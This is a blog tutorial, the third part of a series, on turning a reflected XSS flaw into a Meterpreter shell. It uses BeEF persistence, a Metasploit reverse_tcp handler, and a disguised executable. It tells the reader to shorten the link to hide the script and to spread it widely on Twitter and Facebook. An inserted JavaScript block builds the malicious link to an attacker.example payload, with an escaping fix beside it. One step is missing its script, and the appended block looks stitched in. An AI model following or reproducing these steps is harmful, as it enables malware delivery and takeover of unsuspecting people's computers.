Exploiting XSS with BeEF: Part 3

May 7, 2015 11:29 PM

Now that we have control over a victim's browser, we need to use some attacks to keep that connection alive, or even better, to get a shell on the victim's machine.

Creating a Persistent Connection

Now that the victim's browser is hooked, we need to quickly set up a persistence method to keep the connection alive, because the hook is lost as soon as the victim leaves the page. To do this, click on the victim's IP address under the Online Browsers folder in the Hooked Browsers panel, and go to the Commands tab.


Open the Persistence category and pick whichever module you like. For this tutorial, I'm going to use the Confirm Close Tab module. Select it and press the Execute button in the bottom right corner. Now, if the user tries to close the tab, the page will repeatedly ask them to confirm that they want to leave, which keeps the hook running as long as they keep cancelling (the prompt is not shown in Chrome or in Opera versions before 12, so those browsers are not held this way).


Creating a Shell

Now that we have a persistent connection, we can do all sorts of things with the browser: play sounds, gather information about the victim, and even try to exploit the machine itself. What we're going to do now is get a Meterpreter shell with Metasploit. Note that this part doesn't actually use BeEF at all; it only needs the XSS flaw to deliver a download link.

Step 1: Creating the Payload

Generate the executable you want the victim to run; a basic Meterpreter payload is enough for this example. Give the file an innocuous name that fits the site you are abusing, such as HTML5 Updated Graphics, so it looks like something the site would legitimately offer.

Step 2: Create the Listener

Open Metasploit and type use exploit/multi/handler, then set payload windows/meterpreter/reverse_tcp (or whichever payload you generated) and set LHOST and LPORT to the same values you built into that payload. Type exploit -j -z to start the handler as a background job that keeps listening for incoming sessions. Finally, upload the payload file (not the handler) to your web server so the victim can download it.


Step 3: Creating a Malicious URL

Now we need to create a link that will ask the victim to download our malicious file. The script for doing this is

The script goes into the query parameter of the vulnerable search page, whose URL is http://www.insecurelabs.org/Task/Rule1?query=

I would recommend shortening the finished link with Bit.ly, since the long, URL-encoded script in the query string looks suspicious to anyone who reads the address.

Step 4: Wait for the Connection

Send this link out to many people on Twitter or Facebook and keep the handler listening for connections. You should get many sessions very quickly. Just remember that the file you uploaded should be named something related to the vulnerable website, since that site is where the victim believes the download is coming from.
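The four steps above are the whole delivery chain, so here is one worked example of the web-client side of it, added here and not taken from the original post: it builds a reflected-XSS link of the kind Step 3 describes, shows what a vulnerable search page does with it, and puts the fixed (HTML-encoded) version of the same page beside it so you can see what would have stopped the attack. The insecurelabs.org endpoint is the one named on the page; the attacker host (attacker.example), the file name and the two toy render functions are assumptions for illustration. It runs under Node.js with no dependencies.

```javascript
// Added example, not code from the original post or from BeEF/Metasploit.
// Endpoint: the vulnerable search page named on the page.
const VULNERABLE_ENDPOINT = "http://www.insecurelabs.org/Task/Rule1";

// Hypothetical location of the renamed Meterpreter payload from Step 1.
const PAYLOAD_FILE_URL = "http://attacker.example/HTML5_Updated_Graphics.exe";

// The injected script: when it runs in the victim's browser it navigates to the
// payload file, which makes the browser show a download prompt for it.
function buildDownloadScript(fileUrl) {
  return `<script>location.href=${JSON.stringify(fileUrl)}</script>`;
}

// Put the script into the query parameter. URLSearchParams percent-encodes
// it, so the link survives mail clients and social-media posts; the server
// decodes it again before reflecting it.
function buildAttackUrl(endpoint, script) {
  const u = new URL(endpoint);
  u.searchParams.set("query", script);
  return u.toString();
}

// Toy server side, vulnerable: the parameter is reflected straight into HTML.
function renderVulnerable(query) {
  return `<h2>Results for: ${query}</h2>`;
}

// Toy server side, fixed: HTML-entity encode before reflecting.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderFixed(query) {
  return `<h2>Results for: ${escapeHtml(query)}</h2>`;
}

// What each server does when the victim follows the link: parse the query
// parameter back out of the URL and render the page with it.
function serve(attackUrl, render) {
  const query = new URL(attackUrl).searchParams.get("query") || "";
  return render(query);
}

// Cheap check for whether the rendered page carries a live script tag.
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

function demo() {
  const link = buildAttackUrl(VULNERABLE_ENDPOINT, buildDownloadScript(PAYLOAD_FILE_URL));
  console.log("link to send:              ", link);
  console.log("vulnerable page runs script:", hasScriptTag(serve(link, renderVulnerable)));
  console.log("fixed page runs script:     ", hasScriptTag(serve(link, renderFixed)));
}

demo();
```

The point to take from the two render functions is that the attack only needs the parameter to land in the page unencoded; the fix is output encoding at the point of reflection, not filtering the word "script" out of the input.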

Voila!

Now we've got a Meterpreter session!


Now you can migrate to another process and do whatever you like on their system. The best part is that the payload itself came from your own web server, but the link the victim clicked pointed at the legitimate website, so nothing about the download looked like malware to them.

Conclusion

As you can see, XSS is a fun and easy vulnerability to exploit. I hope you learned much from this series, and if you want some more, I could add some "bonus" attacks to do. ;)

C|H of C3
